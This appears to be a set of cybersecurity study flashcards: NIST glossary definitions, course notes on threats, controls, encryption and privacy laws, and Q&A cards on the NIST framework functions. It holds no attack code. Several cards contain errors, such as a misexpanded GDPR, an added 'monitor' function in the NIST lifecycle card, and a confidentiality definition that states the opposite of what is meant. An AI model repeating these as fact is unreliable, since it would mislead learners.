The discipline that embodies principles, means, and methods for providing information security, including confidentiality, data integrity, non-repudiation, and authenticity. Is categorized as either secret key or public key. Secret key cryptography is based on the use of a single cryptographic key shared between two parties. The same key is used to encrypt and decrypt data. This key is kept secret by the two parties. Public key cryptography is a form of cryptography which makes use of two keys: a public key and a private key. The two keys are related but have the property that, given the public key, it is computationally infeasible to derive the private key [FIPS 140-1]. In a public key cryptosystem, each party has its own public/private key pair. The public key can be known by anyone; the private key is kept secret. Art or science concerning the principles, means, and methods for rendering plain information unintelligible and for restoring encrypted information to intelligible form.
Business Continuity Plan (BCP)
The documentation of a predetermined set of instructions or procedures that describe how an organization's mission/business functions will be sustained during and after a significant disruption. The documentation of a predetermined set of instructions or procedures that describe how an organization's business functions will be sustained during and after a significant disruption.
Incident Response Plan
The documentation of a predetermined set of instructions or procedures to detect, respond to, and limit consequences of a malicious cyber attacks against an organization's information system(s). The documentation of a predetermined set of instructions or procedures to detect, respond to, and limit consequences of an incident against an organization's IT system(s).
Data Loss
The exposure of proprietary, sensitive, or classified information through either data theft or data leakage.
Security Control Assessor
The individual, group, or organization responsible for conducting a security control assessment.
Threat Source
The intent and method targeted at the intentional exploitation of a vulnerability or a situation and method that may accidentally trigger a vulnerability. Synonymous with Threat Agent.
Risk
The level of impact on organizational operations (including mission, functions, image, or reputation), organizational assets, or individuals resulting from the operation of an information system given the potential impact of a threat and the likelihood of that threat occurring. The level of impact on organizational operations (including mission, functions, image, or reputation), organizational assets, individuals, other organizations, or the Nation resulting from the operation of an information system given the potential impact of a threat and the likelihood of that threat occurring. A measure of the extent to which an entity is threatened by a potential circumstance or event, and typically a function of: (i) the adverse impacts that would arise if the circumstance or event occurs; and (ii) the likelihood of occurrence. Note: Information system-related security risks are those risks that arise from the loss of confidentiality, integrity, or availability of information or information systems and consider the adverse impacts to organizational operations (including mission, functions, image, or reputation), organizational assets, individuals, other organizations.
Risk Tolerance
The level of risk an entity is willing to assume in order to achieve a potential desired result. The defined impacts to an enterprise's information systems that an entity is willing to accept. SOURCE: CNSSI-4009 Rogue Device - An unauthorized node on a network.
Potential Impact
The loss of confidentiality, integrity, or availability could be expected to have: 1) a limited adverse effect (FIPS 199 low); 2) a serious adverse effect (FIPS 199 moderate); or 3) a severe or catastrophic adverse effect (FIPS 199 high) on organizational operations, organizational assets, or individuals. Potential Impact - The loss of confidentiality, integrity, or availability could be expected to have a limited adverse effect; a serious adverse effect, or a severe or catastrophic adverse effect on organizational operations, organizational assets, or individuals. The loss of confidentiality, integrity, or availability that could be expected to have a limited (low) adverse effect, a serious (moderate) adverse effect, or a severe or catastrophic (high) adverse effect on organizational operations, organizational assets, or individuals.
Low Impact
The loss of confidentiality, integrity, or availability that could be expected to have a limited adverse effect on organizational operations, organizational assets, individuals, other organizations; 2) results in minor damage to organizational assets; 3) results in minor financial loss; or 4) results in minor harm to individuals).
Moderate Impact
The loss of confidentiality, integrity, or availability that could be expected to have a serious adverse effect on organizational operations, organizational assets, individuals, other organizations, or the national security interests of the United States; (i.e., 1) causes a significant degradation in mission capability to an extent and duration that the organization is able to perform its primary functions, but the effectiveness of the functions is significantly reduced; 2) results in significant damage to organizational assets; 3) results in significant financial loss; or 4) results in significant harm to individuals that does not involve loss of life or serious life threatening injuries)
High Impact
The loss of confidentiality, integrity, or availability that could be expected to have a severe or catastrophic adverse effect on organizational operations, organizational assets, individuals, other organizations, or the national security interests of the United States; (i.e., 1) causes a severe degradation in mission capability to an extent and duration that the organization is able to perform its primary functions, but the effectiveness of the functions is significantly reduced; 2) results in major damage to organizational assets; 3) results in major financial loss; or 4) results in severe or catastrophic harm to individuals involving loss of life or serious life threatening injuries).
Impact
The magnitude of harm that can be expected to result from the consequences of unauthorized disclosure of information, unauthorized modification of information, unauthorized destruction of information, or loss of information or information system availability.
Impact Level
The magnitude of harm that can be expected to result from the consequences of unauthorized disclosure of information, unauthorized modification of information, unauthorized destruction of information, or loss of information or information system availability. High, Moderate, or Low security categories of an information system established in FIPS 199 which classify the intensity of a potential impact that may occur if the information system is jeopardized.
Compensating Security Controls
The management, operational, and technical controls (i.e., safeguards or countermeasures) employed by an organization in lieu of the recommended controls in the low, moderate, or high baselines described in NIST Special Publication 800-53, that provide equivalent or comparable protection for an information system. SOURCE: SP 800-37 The management, operational, and technical controls (i.e., safeguards or countermeasures) employed by an organization in lieu of the recommended controls in the baselines described in NIST Special Publication 800-53 and CNSS Instruction 1253, that provide equivalent or comparable protection for an information system.
Security Controls
The management, operational, and technical controls (i.e., safeguards or countermeasures) prescribed for an information system to protect the confidentiality, integrity, and availability of the system and its information.
Security Control Effectiveness
The measure of correctness of implementation (i.e., how consistently the control implementation complies with the security plan) and how well the security plan meets organizational needs in accordance with current risk tolerance.
Enterprise Risk Management
The methods and processes used by an enterprise to manage risks to its mission and to establish the trust necessary for the enterprise to support shared missions. It involves the identification of mission dependencies on enterprise capabilities, the identification and prioritization of risks due to defined threats, the implementation of countermeasures to provide both a static risk posture and an effective dynamic response to active threats; and it assesses enterprise performance against threats and adjusts countermeasures as necessary.
Baseline Security
The minimum security controls required for safeguarding an IT system based on its identified needs for confidentiality, integrity, and/or availability protection.
IT-Related Risk
The net mission/business impact considering 1) the likelihood that a particular threat source will exploit, or trigger, a particular information system vulnerability, and 2) the resulting impact if this should occur. IT-related risks arise from legal liability or mission/business loss due to, but not limited to: Unauthorized (malicious, non-malicious, or accidental) disclosure, modification, or destruction of information; Non-malicious errors and omissions; IT disruptions due to natural or man-made disasters; or Failure to exercise due care and diligence in the implementation and operation of the IT.
Recovery Time Objective
The overall length of time an information system's components can be in the recovery phase before negatively impacting the organization's mission or mission/business functions.
Computer Forensics
The practice of gathering, retaining, and analyzing computer-related data for investigative purposes in a manner that maintains the integrity of the data.
Forensics
The practice of gathering, retaining, and analyzing computer-related data for investigative purposes in a manner that maintains the integrity of the data. See Also Computer Forensics.
Denial of Service (DoS)
The prevention of authorized access to resources or the delaying of time-critical operations. (Time-critical may be milliseconds or it may be hours, depending upon the service provided.)
Least Trust
The principal that a security architecture should be designed in a way that minimizes 1) the number of components that require trust, and 2) the extent to which each component is trusted.
Risk
The probability that a threat will impact an information resource
Continuous Monitoring
The process implemented to maintain a current security status for one or more information systems or for the entire suite of information systems on which the operational mission of the enterprise depends. The process includes: 1) The development of a strategy to regularly evaluate selected IA controls/metrics, 2) Recording and evaluating IA relevant events and the effectiveness of the enterprise in dealing with those events, 3) Recording changes to IA controls, or changes that affect IA risks, and 4) Publishing the current security status to enable information-sharing decisions involving the enterprise.
Anomaly-Based Detection
The process of comparing definitions of what activity is considered normal against observed events to identify significant deviations.
Full Disk Encryption (FDE)
The process of encrypting all the data on the hard disk drive used to boot a computer, including the computer's operating system, and permitting access to the data only after successful authentication with the full disk encryption product.
File Encryption
The process of encrypting individual files on a storage medium and permitting access to the encrypted data only after proper authentication is provided.
Risk Assessment
The process of identifying risks to organizational operations (including mission, functions, image, or reputation), organizational assets, individuals, other organizations, and the Nation, arising through the operation of an information system. Part of risk management, incorporates threat and vulnerability analyses and considers mitigations provided by security controls planned or in place. Synonymous with risk analysis. The process of identifying, prioritizing, and estimating risks. This includes determining the extent to which adverse circumstances or events could impact an enterprise. Uses the results of threat and vulnerability assessments to identify risk to organizational operations and evaluates those risks in terms of likelihood of occurrence and impacts if they occur. The product of a risk assessment is a list of estimated potential impacts and unmitigated vulnerabilities. Risk assessment is part of risk management and is conducted throughout the Risk Management Framework (RMF).
Risk Analysis
The process of identifying the risks to system security and determining the likelihood of occurrence, the resulting impact, and the additional safeguards that mitigate this impact. Part of risk management and synonymous with risk assessment. Examination of information to identify the risk to an information system. See Risk Assessment.
Risk Management
The process of managing risks to organizational operations (including mission, functions, image, reputation), organizational assets, individuals, other organizations, and the Nation, resulting from the operation of an information system, and includes: (i) the conduct of a risk assessment; (ii) the implementation of a risk mitigation strategy; and (iii) employment of techniques and procedures for the continuous monitoring of the security state of the information system.
Content Filtering
The process of monitoring communications such as email and Web pages, analyzing them for suspicious content, and preventing the delivery of suspicious content to users.
Password Cracking
The process of recovering secret passwords stored in a computer system or transmitted over a network.
Blacklisting
The process of the system invalidating a user ID based on the user's inappropriate actions. A blacklisted user ID cannot be used to log on to the system, even with the correct authenticator. Blacklisting and lifting of a blacklisting are both security-relevant events. Blacklisting also applies to blocks placed against IP addresses to prevent inappropriate or unauthorized use of Internet resources.
Keystroke Monitoring
The process used to view or record both the keystrokes entered by a computer user and the computer's response during an interactive session. Keystroke monitoring is usually considered a special case of audit trails.
Firmware
The programs and data components of a cryptographic module that are stored in hardware within the cryptographic boundary and cannot be dynamically written or modified during execution. Computer programs and data stored in hardware - typically in readonly memory (ROM) or programmable read-only memory (PROM) - such that the programs and data cannot be dynamically written or modified during execution of the programs.
Data Integrity
The property that data has not been altered in an unauthorized manner. Data integrity covers data in storage, during processing, and while in transit. The property that data has not been changed, destroyed, or lost in an unauthorized or accidental manner.
Information Security
The protection of information and information systems from unauthorized access, use, disclosure, disruption, modification, or destruction in order to provide confidentiality, integrity, and availability.
Information Security Risk
The risk to organizational operations (including mission, functions, image, reputation), organizational assets, individuals, other organizations, and the Nation due to the potential for unauthorized access, use, disclosure, disruption, modification, or destruction of information and/or information systems.
Technical Controls
The security controls (i.e., safeguards or countermeasures) for an information system that are primarily implemented and executed by the information system through mechanisms contained in the hardware, software, or firmware components of the system.
Operational Controls
The security controls (i.e., safeguards or countermeasures) for an information system that primarily are implemented and executed by people (as opposed to systems).
Least Privilege
The security objective of granting users only those accesses they need to perform their official duties. The principle that a security architecture should be designed so that each entity is granted the minimum system resources and authorizations that the entity needs to perform its function.
Security Controls Baseline
The set of minimum security controls defined for a low-impact, moderate-impact, or high-impact information system
Security Control Baseline
The set of minimum security controls defined for a low-impact, moderate-impact, or high-impact information system.
Patch Management
The systematic notification, identification, deployment, installation, and verification of operating system and application software code revisions. These revisions are known as patches, hot fixes, and service packs.
Authenticate
To confirm the identity of an entity when that identity is presented. To verify the identity of a user, user device, or other entity.
Phishing
Tricking individuals into disclosing sensitive personal information through deceptive computer-based means. Deceiving individuals into disclosing sensitive personal information through deceptive computer-based means. A digital form of social engineering that uses authentic-looking—but bogus—emails to request information from users or direct them to a fake Web site that requests information.
Back Door
Typically unauthorized hidden software or hardware mechanism used to circumvent security controls. An undocumented way of gaining access to a computer system. A backdoor is a potential security risk.
Intrusion
Unauthorized act of bypassing the security mechanisms of a system.
Automated Security Monitoring
Use of automated procedures to ensure security controls are not circumvented or the use of these tools to track actions taken by subjects suspected of misusing the information system.
Distributed Denial of Service attacks (DDoS)
Use of numerous computers to launch a DoS so that the defender cannnot stop the attack by only blocking the one IP address where the attack arose
Intellectual Property
Useful artistic, technical, and/or industrial information, knowledge or ideas that convey ownership and control of tangible or virtual usage and/or representation.
Port Scanning
Using a program to remotely determine which ports on a system are open (e.g., whether systems allow connections through those ports).
Vulnerability
Weakness in an information system, system security procedures, internal controls, or implementation that could be exploited or triggered by a threat source. A weakness in a system, application, or network that is subject to exploitation or misuse. Weakness in an information system, system security procedures, internal controls, or implementation that could be exploited by a threat source.
Masquerading
When an unauthorized agent claims the identity of another agent, it is said to be masquerading. A type of threat action whereby an unauthorized entity gains access to a system or performs a malicious act by illegitimately posing as an authorized entity.
Situational Awareness
Within a volume of time and space, the perception of an enterprise's security posture and its threat environment; the comprehension/meaning of both taken together (risk); and the projection of their status into the near future.
Malware (forms of)
- Viruses - Worms - Trojan horses (Software that appears benign but does something other than expected) - SQL Injection attacks (Hackers submit data to Web forms that exploits site's unprotected software and sends rogue SQL query to database)
what are the NIST components of the cybersecurity lifecycle
identify, monitor, protect, detect, respond, recover
what are the three main methods or controls that shape cybersecurity?
people, process, technology
What is cybersecurity
preventing the unauthorized access to data and information systems
Computer Crime
- *Defined as "any violations of criminal law that involve a knowledge of computer technology for their perpetration, investigation, or prosecution"* > National Information Infrastructure Protection Act in 1996 makes virus distribution and hacker attacks to disable Web sites federal crimes (up to 20 years in jail). - *Computer may be target of crime, for example:* > Breaching confidentiality of protected computerized data > Accessing a computer system without authority - *Computer may be instrument of crime, for example:* > Using e-mail for threats or harassment > Theft of Intellectual property Trade Secret = company secret, not public information Patent = Protects invention or process for 20 years Copyright = Protects ownership of the property for the life of the creator plus 70 years
Why systems are vulnerable
- Accessibility of networks via unauthenticated sources (e.e., open to the internet) - Hardware problems (breakdowns, configuration errors, damage from improper use or crime, failure to maintain patches to the hardware such as a firmware update. - Software Problems (programming or installation errors, unauthorized changes, failure to maintain patches to the software) - Use of networks/computers outside of firm's control - Loss and theft of end points with authenticated access to the systems such as portable devices
Cyberterrorism and Cyberwarfare
- Attack via the Internet using a target's computer systems to cause physical, real-world harm - Usually employed to carry out a political agenda - Supervisory control and data acquisition (the systems that run the real world systems such as manufacturing plants, the power grid and such.(SCADA) or Industrial Control Systems (ICS) attacks - SCADA systems control chemical, physical, or transport processes (i.e., oil refineries, water and sewage treatment plants, electrical generators, and nuclear power plants) - 1982 Soviet Gas Pipeline / Farewell Dossier
Identity Management
- Business processes and tools to identify valid users of system and control access > Identifies and authorizes different categories of users > Specifies which portion of system users can access > Authenticating users and protects identities - Identity management systems > Captures access rules for different levels of users
Antivirus and Antispyware software
- Checks computers for presence of malware and can often eliminate it as well - Requires continual updating
Firewall
- Combination of hardware and software that prevents unauthorized users from accessing private networks - Technologies include: > Static packet filtering > Stateful inspection > Network address translation (NAT) > Application proxy filtering
Software Vulnerability
- Commercial software contains flaws that create security vulnerabilities > Hidden bugs (program code defects) * Zero defects cannot be achieved because complete testing is not possible with large programs > Flaws can open networks to intruders - Patches > Small pieces of software to repair flaws > Exploits often created faster than patches can be released and implemented
Digital Certificate
- Data file used to establish the identity of users and electronic assets for protection of online transactions - Uses a trusted third party, certification authority (CA), to validate a user's identity - CA verifies user's identity, stores information in CA server, which generates encrypted digital certificate containing owner ID information and copy of owner's public key
Worms and Viruses spread (propagated) by
- Downloads - E-mail, IM attachments - Downloads on web sites and social networks - Shared USB drives
Sniffer
- Eavesdropping program that monitors information traveling over network - Enables hackers to steal proprietary information such as e-mail, company files, and so on
Electronic Evidence
- Evidence for white collar crimes often in digital form > Data on computers, e-mail, instant messages, e-commerce transactions - Proper control of data can save time and money when responding to legal discovery request
IS Audit or Assessment
- Examines firm's overall security environment as well as controls governing individual information systems - Reviews technologies, procedures, documentation, training, and personnel. - May even simulate disaster to test response of technology, IS staff, other employees - Lists and ranks all control weaknesses and estimates probability of their occurrence - Assesses financial and organizational impact of each threat
Public Key Infrastructure (PKI)
- Use of public key cryptography working with certificate authority - Widely used in e-commerce
Public Key Encryption
- Uses two, mathematically related keys: Public key and private key - Sender encrypts message with recipient's public key - Recipient decrypts with private key
Business Value of Security and Control
- Failed computer systems can lead to significant or total loss of business function. - Firms now are more vulnerable than ever. - Confidential personal and financial data > TARGET Customer Breach - Estimated costs $61M (as of 2-26-14) - Trade secrets, new products, strategies - A security breach may cut into a firm's market value almost immediately. - Inadequate security and controls also bring forth issues of liability.
Fault-Tolerant Computer Systems
- For continuous availability, for example, stock markets - Contain redundant hardware, software, and power supply components that create an environment that provides continuous, uninterrupted service
General Controls
- Govern design, security, and use of computer programs and security of data files in general throughout organization's information technology infrastructure - Apply to all computerized applications - Combination of hardware, software, and manual procedures to create overall control environment
High-Availability Computing
- Helps recover quickly from crash - Minimizes, does not eliminate, downtime
Espionage or Trespass
- Individual attempts to gain illegal access to organizational information - Competitive intelligence: Legal information gathering - Industrial espionage: Crosses the legal boundary
Information Systems and Ethics
- Information systems raise new ethical questions because they create opportunities for: > Intense social change, threatening existing distributions of power, money, rights, and obligations > New kinds of crime
Information Systems Controls
- Manual and automated controls - General and application controls
Spoofing
- Misrepresenting oneself by using fake e-mail addresses or masquerading as someone else - Redirecting Web link to address different from intended one, with site masquerading as intended destination
Intrusion Detection Systems
- Monitors hot spots on corporate networks to detect and deter intruders - Examines events as they are happening to discover attacks in progress
Internet Vulnerabilities
- Network open to anyone - Size of internet means abuses can have wide impact - Use of fixed internet addresses (IPs) with cable/DSL modems creates fixed targets for hackers - encrypted VOIP - E-mail, P2P, IM
Risk Mitigation
- Organization takes concrete actions against risk - Implement controls and develop recovery plan - Three strategies: *Risk acceptance*: Accept the potential risk, continue operating with no controls, and absorb any damages that occur *Risk limitation:* Limit the risk by implementing controls that minimize the impact of threat *Risk transference:* Transfer the risk by using other means to compensate for the loss, such as purchasing insurance
Risk Analysis
- Prioritize assets (probability x value) - Compare cost of security breach vs. cost of control
Security Policy
- Ranks information risks, identifies acceptable security goals, and identifies mechanisms for achieving these goals - Drives other policies > Acceptable use policy (AUP): Defines acceptable uses of firm's information resources and computing equipment > Authorization policies: Determine differing levels of user access to information assets
Security in the Cloud
- Responsibility for security resides with company owning the data - Firms must ensure providers provides adequate protection: > Where data are stored > Meeting corporate requirements, legal privacy laws > Segregation of data from other clients > Audits and security certifications - Service level agreements (SLAs)
Computer Forensics
- Scientific collection, examination, authentication, preservation, and analysis of data from computer storage media for use as evidence in court of law - Includes recovery of ambient and hidden data
Securing Mobile Platforms
- Security policies should include and cover any special requirements for mobile devices > Guidelines for use of platforms and applications - Mobile device management tools > Authorization > Inventory records > Control updates > Lock down/erase lost devices > Encryption - Software for segregating corporate data on devices
Internal Threats: Employees
- Security threats often originate inside an organization - Inside knowledge - Sloppy security procedures > User lack of knowledge - Social engineering: > Tricking employees into revealing their passwords by pretending to be legitimate members of the company in need of information *One in five employees would sell the passwords they use at work to access employer networks if they were asked (US is highest country)*
spyware
- Small programs install themselves surreptitiously on computers to monitor user Web surfing activity and serve up advertising - Key loggers > Record every keystroke on computer to steal serial numbers, passwords, launch Internet attacks - Other types: > Reset browser home page > Redirect search requests > Slow computer performance by taking up memory
Wireless Security Challenges
- Smartphones as vulnerable as computers - Radio frequency bands easy to scan - SSIDs (service set identifiers) > Identify access points > Broadcast multiple times > Can be identified by sniffer programs
Types of General Controls
- Software controls - Hardware controls - Computer operations controls - Data security controls - Implementation controls - Administrative controls
Application Controls
- Specific controls unique to each computerized application, such as payroll or order processing - Include both automated and manual procedures - Ensure that only authorized data are completely and accurately processed by that application - Include: > Input controls > Processing controls > Output controls
Encryption
- Transforming text or data into cipher text that cannot be read by unintended recipients - Two methods for encryption on networks > Symmetric key encryption > Public Key encryption
Whitelisting and Blacklisting
- Whitelisting: Allows acceptable software to run / connections/email accepted - Blacklisting: Allows everything to run unless it is on the blacklist
what is the role of people in cybersecurity
- giving people the skills and information to implement an effective cybersecurity program - training, awareness, building skills
why is the perimeter model not fully effective in cybersecurity
- the perimeter is not perfect and is only one layer - you have to violate the perimeter all the time to share information between authorized users - too many doors and windows
Legal and regulatory requirements for electronic records management and privacy protection
-GDPR: Global Data Protection Regulations (EU only regulation) - *HIPAA:* Medical security and privacy rules and procedures - *Gramm-Leach-Bliley Act:* Requires financial institutions to ensure the security and confidentiality of customer data - *Sarbanes-Oxley Act:* Imposes responsibility on companies and their management to safeguard the accuracy and integrity of financial information that is used internally and released externally
Access Point
A device that logically connects wireless client devices operating in infrastructure to one another and provides access to a distribution system, if connected, which is typically an organization's enterprise wired network. SOURCE: SP 800-48; SP 800-121
Access Control Lists (ACLs)
A register of: 1. users (including groups, machines, processes) who have beengiven permission to use a particular system resource, and 2. the types of access they have been permitted. SOURCE: SP 800-12
Administrative Account
A user account with full privileges on a computer.
Access
Ability to make use of any information system (IS) resource. Ability and means to communicate with or otherwise interact with a system, to use system resources to handle information, to gain knowledge of the information the system contains, or to control system components and functions.
Advanced Persistent Threats(APT)
An adversary that possesses sophisticated levels of expertise and significant resources which allow it to create opportunities to achieve its objectives by using multiple attack vectors (e.g., cyber, physical, and deception). These objectives typically include establishing and extending footholds within the information technology infrastructure of the targeted organizations for purposes of exfiltrating information, undermining or impeding critical aspects of a mission, program, or organization; or positioning itself to carry out these objectives in the future. The advanced persistent threat: (i) pursues its objectives repeatedly over an extended period of time; (ii) adapts to defenders' efforts to resist it; and (iii) is determined to maintain the level of interaction needed to execute its objectives.
Active Attack
An attack that alters a system or data. An attack on the authentication protocol where the Attacker transmits data to the Claimant, Credential Service Provider, Verifier, or Relying Party. Examples of active attacks include man-in-the-middle, impersonation, and session hijacking.
What is the Detect function in the NIST model?
Detect: Identifying the occurrence of a cybersecurity event (an incursion or attempted incursion) in a timely manner Details: The Detect Function defines the appropriate activities to identify the occurrence of a cybersecurity event. The Detect Function enables timely discovery of cybersecurity events. Examples of outcome Categories within this Function include: Ensuring Anomalies and Events are detected, and their potential impact is understood Implementing Security Continuous Monitoring capabilities to monitor cybersecurity events and verify the effectiveness of protective measures including network and physical activities Maintaining Detection Processes to provide awareness of anomalous events
Risk Assessment
Determines level of risk to firm if specific activity or process is not properly controlled - Types of threat > Probability of occurrence during year > Potential losses, value of threat > Expected annual loss
Disaster Recovery Planning
Devises plans for restoration of disrupted services
What is War Driving
Eavesdroppers drive by buildings and try to detect SSID and gain access to network and resources > Once access point is breached, intruder can use OS to access networked drives and files
Active Content
Electronic documents that can carry out or trigger actions automatically on a computer platform without the intervention of a user. Software in various forms that is able to automatically carry out or trigger actions on a computer platform without the intervention of a user.
Denial of Service attacks (DoS)
Flooding server with thousands of false requests (such as trying to login to the website) to crash the network
Business continuity planning
Focuses on restoring business operations after disaster
What is the Identify function in the NIST model?
Identify The Identify Function assists in developing an organizational understanding to managing cybersecurity risk to systems, people, assets, data, and capabilities. Understanding the business context, the resources that support critical functions, and the related cybersecurity risks enables an organization to focus and prioritize its efforts, consistent with its risk management strategy and business needs. Examples of outcome Categories within this Function include: Identifying physical and software assets within the organization to establish the basis of an Asset Management program Identifying the Business Environment the organization supports including the organization's role in the supply chain, and the organizations place in the critical infrastructure sector Identifying cybersecurity policies established within the organization to define the Governance program as well as identifying legal and regulatory requirements regarding the cybersecurity capabilities of the organization Identifying asset vulnerabilities, threats to internal and external organizational resources, and risk response activities as a basis for the organizations Risk Assessment Identifying a Risk Management Strategy for the organization including establishing risk tolerances Identifying a Supply Chain Risk Management strategy including priorities, constraints, risk tolerances, and assumptions used to support risk decisions associated with managing supply chain risks
Worms
Independent programs that copy themselves from one computer to other computers over a network.
Adversary
Individual, group, organization, or government that conducts or has the intent to conduct detrimental activities.
Cybervandalism
Intentional disruption, defacement, destruction of Web site or corporate information system A common tactic of Hacktivist
Alert
Notification that a specific attack has been directed at an organization's information systems.
Software Metrics
Objective assessments of system in form of quantified measurements > Number of transactions > Online response time > Payroll checks printed per hour > Known bugs per hundred lines of code
Ensuring System Availability
Online transaction processing requires 100% availability, no downtime
Internal Auditors
Part of accounting internal auditing that validates policies and procedures are being followed
Debugging
Process by which errors are eliminated
Adequate Security
Security commensurate with the risk and the magnitude of harm resulting from the loss, misuse, or unauthorized access to or modification of information. Security commensurate with the risk and magnitude of harm resulting from the loss, misuse, or unauthorized access to or modification of information. Note: This includes assuring that information systems operate effectively and provide appropriate confidentiality, integrity, and availability, through the use of cost-effective management, personnel, operational, and technical controls.
Access Control Mechanism
Security safeguards (i.e., hardware and software features, physical controls, operating procedures, management procedures, and various combinations of these) designed to detect and deny unauthorized access and permit authorized access to an information system. SOURCE: CNSSI-4009
Active Security Testing
Security testing that involves direct interaction with a target, such as sending packets to a target.
Symmetric Key Encryption
Sender and receiver use single, shared key
Phishing
Setting up fake Web sites or sending e-mail messages that look like legitimate businesses to ask users for confidential personal data.
what is the Protect function in the NIST model
The Protect Function outlines appropriate safeguards to ensure delivery of critical infrastructure services. The Protect Function supports the ability to limit or contain the impact of a potential cybersecurity event. Examples of outcome Categories within this Function include: Protections for Identity Management and Access Control within the organization including physical and remote access Empowering staff within the organization through Awareness and Training including role based and privileged user training Establishing Data Security protection consistent with the organization's risk strategy to protect the confidentiality, integrity, and availability of information Implementing Information Protection Processes and Procedures to maintain and manage the protections of information systems and assets Protecting organizational resources through Maintenance, including remote maintenance, activities Managing Protective Technology to ensure the security and resilience of systems and assists are consistent with organizational policies, procedures, and agreements
Identity Theft
Theft of personal Information (social security ID, driver's license, or credit card numbers) to impersonate someone else
Access Control
The process of granting or denying specific requests to: 1) obtain and use information and related information processing services; and 2) enter specific physical facilities (e.g., federal buildings, military establishments, border crossing entrances).
Accountability
The security goal that generates the requirement for actions of an entity to be traced uniquely to that entity. This supports nonrepudiation, deterrence, fault isolation, intrusion detection and prevention, and after-action recovery and legal action. SOURCE: SP 800-27 Principle that an individual is entrusted to safeguard and control equipment, keying material, and information and is answerable to proper authority for the loss or misuse of that equipment or information. SOURCE: CNSSI-4009
What is the Recover function in the NIST model
To maintain plans for resilience and to restore services impaired during cybersecurity incidents Details: The Recover Function identifies appropriate activities to maintain plans for resilience and to restore any capabilities or services that were impaired due to a cybersecurity incident. The Recover Function supports timely recovery to normal operations to reduce the impact from a cybersecurity incident. Examples of outcome Categories within this Function include: Ensuring the organization implements Recovery Planning processes and procedures to restore systems and/or assets affected by cybersecurity incidents Implementing Improvements based on lessons learned and reviews of existing strategies Internal and external Communications are coordinated during and following the recovery from a cybersecurity incident
What is the Respond function in the NIST model?
To take action regarding . detected cybersecurity incident to minimize impact Details: The Respond Function includes appropriate activities to take action regarding a detected cybersecurity incident. The Respond Function supports the ability to contain the impact of a potential cybersecurity incident. Examples of outcome Categories within this Function include: Ensuring Response Planning process are executed during and after an incident Managing Communications during and after an event with stakeholders, law enforcement, external stakeholders as appropriate Analysis is conducted to ensure effective response and support recovery activities including forensic analysis, and determining the impact of incidents Mitigation activities are performed to prevent expansion of an event and to resolve the incident The organization implements Improvements by incorporating lessons learned from current and previous detection / response activities
Evil Twins
Wireless networks that pretend to offer trustworthy Wi-Fi connections to the Internet
what three goals does cybersecurity have
confidentiality, integrity, accessibility
what is the confidentiality goal of cybersecurity
ensuring no one with authorized can access information
what is the integrity goal of cybersecurity
ensuring the data hasn't been manipulated and is accurate
what is the availability goal of cybersecurity
ensuring the systems are available to the end users
what is the cybersecurity lifecycle
the components of cybersecurity according to NIST
what is the old model to approach cybersecurity
the perimeter model (hard shell, soft inside)
what is process in cybersecurity
the policies and organizational procedures used to implement and manage the cybersecurity program
what role does technology play in cybersecurity
the tools or controls used to implement the cybersecurity lifecycle